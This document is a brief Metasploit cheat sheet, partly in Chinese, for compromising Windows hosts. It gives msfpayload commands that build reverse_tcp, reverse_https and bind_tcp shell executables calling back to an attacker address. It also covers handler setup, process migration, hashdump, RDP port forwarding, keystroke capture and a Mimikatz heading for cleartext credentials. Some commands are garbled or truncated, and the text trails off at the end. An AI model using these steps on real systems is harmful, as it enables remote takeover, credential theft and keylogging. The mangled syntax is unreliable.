generate Shell.exe for listening:reverse_tcp (reverse connection)
Path:payload/windows/meterpreter/reverse_tcp
Msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=8080 X > ~/desktop/shell.exe
Reverse_http/https (Reverse connection)
Pathpayload/windows/meterpreter/reverse_http/https
Msfpayload Windows/meterpreter/reverse_https lhost=192.168.1.2 lport=8080 X > ~/desktop/shell.exe
Through the way of Http/https reverse connection, in the case of slow speed, unstable, on a blog to see HTTPS if the bounce did not receive data, you can change the listening port to 443 try.
BIND_TCP (Forward connection)
Path:payload/windows/meterpreter/bind_tcp
Forward connection shell, because in the intranet across the network segment can not connect to attack machine, so in the intranet is often used, do not need to set up lhost.
using Shell.exe monitoring:
MSF > Use exploit/multi/> Set payload windows/meterpreter/> Set lhost 192.168.1.2 > Set lport 8080> Exploit->sessions
Basic command:
Common commands:
background:将当前会话放置后台load/use:加载模块Interact:切换进一个信道migrate:迁移进程run:执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。Resource:执行一个已有的rc脚本。
写入文件夹:
Meterpreter >>>>> ls
Write content:
Edit + file, call VI Editor.
Network Related:
The network command lists IP information (ipconfig), shows the modified route table (route), and Port forwarding (PORTFWD)
Meterpreter >> Portfwd add-l 1314-p 3389-r 192.168.1.2
After the rules are established, you can connect to the local 1314 port so that the remote port 3389 is forwarded.
Keyboard monitoring:
Meterpreter >>> Keyscan_dump
Notice the concept of the Windows Session window, which divides the Windows desktop into different sessions (session) To facilitate interaction with Windows. Session 0 represents the console, 1, and 2 represents the Remote Desktop. So to intercept the keyboard input must be done in 0. You can use Getdesktop to view or cut a picture to try. Otherwise, use the setdesktop switch.
If not, switch to the Explorer.exe process, which also allows you to hear the keyboard input data after the Remote Desktop Connection comes in.
Mimikatz:
Fetching Clear Text
Kali generate Shell listener target host